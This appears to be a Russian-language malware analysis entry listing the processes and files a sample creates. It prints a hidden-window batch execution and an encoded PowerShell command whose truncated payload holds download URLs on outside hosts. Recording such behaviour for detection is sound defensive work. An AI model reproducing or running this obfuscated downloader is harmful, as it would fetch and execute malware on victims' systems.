Техническая информация
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\cbjwektde.bat" "
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1440
- %ALLUSERSPROFILE%\cbjwektde.bat
- %TEMP%\731863.cvr
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\cbjwektde.bat" "' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc JAByAG8AdwBpAGYAaQB1AGQAPQAiAGgAdAB0AHAAOgAvAC8AYQBsAHQAaAB5AHAAbABhAG4AZQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ARQBMAFcAYQA4AFkAYwBPAHEAbABKAG4ALwAsAGgAdAB0AHAAOgAvAC8AZAByAGUAYQBtAGQAYQBu...